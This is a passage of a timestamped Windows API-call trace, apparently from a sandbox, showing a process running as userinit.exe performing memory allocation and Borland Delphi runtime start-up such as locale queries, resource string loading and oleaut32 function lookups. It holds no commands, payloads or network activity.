[0190.340] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfa000, uFlags=0x2) returned 0x36000c
[0190.357] GlobalLock (hMem=0x36000c) returned 0x2730020
[0190.357] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0190.357] GlobalUnlock (hMem=0x36000c) returned 0
[0190.357] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfc000, uFlags=0x2) returned 0x36000c
[0190.374] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.375] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.375] GlobalUnlock (hMem=0x36000c) returned 0
[0190.375] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfe000, uFlags=0x2) returned 0x36000c
[0190.392] GlobalLock (hMem=0x36000c) returned 0x2730020
[0190.392] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0190.392] GlobalUnlock (hMem=0x36000c) returned 0
[0190.392] GlobalReAlloc (hMem=0x36000c, dwBytes=0x100000, uFlags=0x2) returned 0x36000c
[0190.409] GlobalLock (hMem=0x36000c) returned 0x2830020
[0190.410] GlobalHandle (pMem=0x2830020) returned 0x36000c
[0190.410] GlobalUnlock (hMem=0x36000c) returned 0
[0190.410] GlobalReAlloc (hMem=0x36000c, dwBytes=0x102000, uFlags=0x2) returned 0x36000c
[0190.426] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.427] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.427] GlobalUnlock (hMem=0x36000c) returned 0
[0190.427] GlobalReAlloc (hMem=0x36000c, dwBytes=0x104000, uFlags=0x2) returned 0x36000c
[0190.445] GlobalLock (hMem=0x36000c) returned 0x2740020
[0190.445] GlobalHandle (pMem=0x2740020) returned 0x36000c
[0190.445] GlobalUnlock (hMem=0x36000c) returned 0
[0190.445] GlobalReAlloc (hMem=0x36000c, dwBytes=0x106000, uFlags=0x2) returned 0x36000c
[0190.463] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.464] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.464] GlobalUnlock (hMem=0x36000c) returned 0
[0190.464] GlobalReAlloc (hMem=0x36000c, dwBytes=0x108000, uFlags=0x2) returned 0x36000c
[0190.481] GlobalLock (hMem=0x36000c) returned 0x2740020
[0190.482] GlobalHandle (pMem=0x2740020) returned 0x36000c
[0190.482] GlobalUnlock (hMem=0x36000c) returned 0
[0190.482] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10a000, uFlags=0x2) returned 0x36000c
[0190.499] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.500] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.500] GlobalUnlock (hMem=0x36000c) returned 0
[0190.500] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10c000, uFlags=0x2) returned 0x36000c
[0190.518] GlobalLock (hMem=0x36000c) returned 0x2740020
[0190.519] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2630000
[0190.519] VirtualAlloc (lpAddress=0x2630000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2630000
[0190.549] GetKeyboardType (nTypeFlag=0) returned 4
[0190.549] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0190.549] GetStartupInfoA (in: lpStartupInfo=0x8f130 | out: lpStartupInfo=0x8f130*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0190.549] GetVersion () returned 0x1db10106
[0190.549] GetVersion () returned 0x1db10106
[0190.549] GetCurrentThreadId () returned 0x810
[0190.549] GetModuleFileNameA (in: hModule=0x2850000, lpFilename=0x8ec2c, nSize=0x105 | out: lpFilename="<ì\x08" (normalized: "c:\\windows\\system32\\<ì\x08")) returned 0x0
[0190.549] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8eb07, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.549] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8ec1c | out: phkResult=0x8ec1c*=0x0) returned 0x2
[0190.549] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8ec1c | out: phkResult=0x8ec1c*=0x0) returned 0x2
[0190.549] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8ec1c | out: phkResult=0x8ec1c*=0x0) returned 0x2
[0190.549] lstrcpynA (in: lpString1=0x8eb07, lpString2="<ì\x08", iMaxLength=261 | out: lpString1="<ì\x08") returned="<ì\x08"
[0190.549] GetThreadLocale () returned 0x409
[0190.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x8ec17, cchData=5 | out: lpLCData="ENU") returned 4
[0190.549] lstrlenA (lpString="<ì\x08") returned 3
[0190.549] LoadStringA (in: hInstance=0x2850000, uID=0xffc4, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0190.549] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x15dcc0
[0190.549] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2970000
[0190.549] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x15ecc0
[0190.549] VirtualAlloc (lpAddress=0x2970000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2970000
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffc3, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffc1, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffc2, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffd4, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffdd, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffd3, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffd0, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffd7, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffd6, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe8, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe9, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffea, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe7, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe5, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe3, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe2, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe1, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe0, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffff, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfffe, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfffd, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfffc, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfffb, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfffa, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfff9, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfff8, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfff7, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfff6, lpBuffer=0x8ed50, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xfff4, lpBuffer=0x8ed3c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0190.550] LoadStringA (in: hInstance=0x2850000, uID=0xffe4, lpBuffer=0x8ed3c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0190.550] GetVersionExA (in: lpVersionInformation=0x8f0d4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2850000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<
\x02·\"
\x02lñ\x08") | out: lpVersionInformation=0x8f0d4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0190.551] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0190.551] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0190.551] GetThreadLocale () returned 0x409
[0190.551] GetThreadLocale () returned 0x409
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x8efac, cchData=256 | out: lpLCData="Jan") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x8efac, cchData=256 | out: lpLCData="January") returned 8
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x8efac, cchData=256 | out: lpLCData="Feb") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x8efac, cchData=256 | out: lpLCData="February") returned 9
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x8efac, cchData=256 | out: lpLCData="Mar") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x8efac, cchData=256 | out: lpLCData="March") returned 6
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x8efac, cchData=256 | out: lpLCData="Apr") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x8efac, cchData=256 | out: lpLCData="April") returned 6
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x8efac, cchData=256 | out: lpLCData="May") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x8efac, cchData=256 | out: lpLCData="May") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x8efac, cchData=256 | out: lpLCData="Jun") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x8efac, cchData=256 | out: lpLCData="June") returned 5
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x8efac, cchData=256 | out: lpLCData="Jul") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x8efac, cchData=256 | out: lpLCData="July") returned 5
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x8efac, cchData=256 | out: lpLCData="Aug") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x8efac, cchData=256 | out: lpLCData="August") returned 7
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x8efac, cchData=256 | out: lpLCData="Sep") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x8efac, cchData=256 | out: lpLCData="September") returned 10
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x8efac, cchData=256 | out: lpLCData="Oct") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x8efac, cchData=256 | out: lpLCData="October") returned 8
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x8efac, cchData=256 | out: lpLCData="Nov") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x8efac, cchData=256 | out: lpLCData="November") returned 9
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x8efac, cchData=256 | out: lpLCData="Dec") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x8efac, cchData=256 | out: lpLCData="December") returned 9
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x8efac, cchData=256 | out: lpLCData="Sun") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x8efac, cchData=256 | out: lpLCData="Sunday") returned 7
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x8efac, cchData=256 | out: lpLCData="Mon") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x8efac, cchData=256 | out: lpLCData="Monday") returned 7
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x8efac, cchData=256 | out: lpLCData="Tue") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x8efac, cchData=256 | out: lpLCData="Tuesday") returned 8
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x8efac, cchData=256 | out: lpLCData="Wed") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x8efac, cchData=256 | out: lpLCData="Wednesday") returned 10
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x8efac, cchData=256 | out: lpLCData="Thu") returned 4
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x8efac, cchData=256 | out: lpLCData="Thursday") returned 9
[0190.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x8efac, cchData=256 | out: lpLCData="Fri") returned 4
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x8efac, cchData=256 | out: lpLCData="Friday") returned 7
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x8efac, cchData=256 | out: lpLCData="Sat") returned 4
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x8efac, cchData=256 | out: lpLCData="Saturday") returned 9
[0190.552] GetThreadLocale () returned 0x409
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x8f008, cchData=256 | out: lpLCData="$") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x8f008, cchData=256 | out: lpLCData="0") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x8f008, cchData=256 | out: lpLCData="0") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x8f100, cchData=2 | out: lpLCData=",") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x8f100, cchData=2 | out: lpLCData=".") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x8f008, cchData=256 | out: lpLCData="2") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x8f100, cchData=2 | out: lpLCData="/") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x8f008, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0190.552] GetThreadLocale () returned 0x409
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x8efd4, cchData=256 | out: lpLCData="1") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x8f008, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0190.552] GetThreadLocale () returned 0x409
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x8efd4, cchData=256 | out: lpLCData="1") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x8f100, cchData=2 | out: lpLCData=":") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x8f008, cchData=256 | out: lpLCData="AM") returned 3
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x8f008, cchData=256 | out: lpLCData="PM") returned 3
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x8f008, cchData=256 | out: lpLCData="0") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x8f008, cchData=256 | out: lpLCData="0") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x8f008, cchData=256 | out: lpLCData="0") returned 2
[0190.552] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x8f100, cchData=2 | out: lpLCData=",") returned 2
[0190.552] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0190.552] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0190.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0190.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0190.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0190.552] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0190.553] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0190.554] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0190.554] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0190.554] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0190.554] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0190.554] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0190.554] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0190.554] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0190.554] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0190.554] GetDC (hWnd=0x0) returned 0x68010872
[0190.554] GetDeviceCaps (hdc=0x68010872, index=90) returned 96
[0190.554] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.554] GetDC (hWnd=0x0) returned 0x68010872
[0190.554] GetDeviceCaps (hdc=0x68010872, index=104) returned 0
[0190.554] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0190.554] CreatePalette (plpal=0x8ed64) returned 0x8708085b
[0190.554] GetStockObject (i=7) returned 0x1b00017
[0190.554] GetStockObject (i=5) returned 0x1900015
[0190.554] GetStockObject (i=13) returned 0x18a002e
[0190.555] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0190.555] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff3d, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff3c, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff3b, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff3a, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff39, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff38, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff37, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff36, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff35, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff34, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff33, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff32, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff31, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff30, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff4f, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff4e, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff4d, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0190.555] LoadStringA (in: hInstance=0x2850000, uID=0xff4c, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0190.555] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0190.555] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0190.555] GetCurrentThreadId () returned 0x810
[0190.555] GlobalAddAtomA (lpString="WndProcPtr0285000000000810") returned 0xc0f3
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfefc, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfefb, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfefa, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef9, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef8, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef7, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef6, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef5, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef4, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef3, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef2, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef1, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xfef0, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff0f, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff0e, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff0d, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff0c, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff0b, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0190.556] LoadStringA (in: hInstance=0x2850000, uID=0xff0a, lpBuffer=0x8ed60, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
